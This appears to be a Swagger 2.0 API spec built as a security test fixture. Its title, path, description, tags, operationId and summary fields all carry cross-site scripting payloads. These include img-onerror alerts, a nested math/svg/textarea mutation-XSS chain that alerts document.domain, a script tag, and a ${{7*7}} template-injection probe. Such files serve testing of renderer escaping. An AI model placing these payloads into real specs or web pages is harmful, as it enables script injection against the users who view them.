swagger: '2.0'
info:
  title: Example '"><img src=x onerror=alert(1)>
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(document.domain)'>">
paths:
  /accounts'"><img src=x onerror=alert(1)>:
    get:
      responses:
        '200':
          description: No response was specified'"><script>alert(1)</script>${{7*7}}<marquee>Hacked</marquee>
      tags:
        - accounts'"><img src=x onerror=alert(1)>
      operationId: findAccounts'"><img src=x onerror=alert(1)>
      summary: Finds all accounts'"><img src=x onerror=alert(1)>
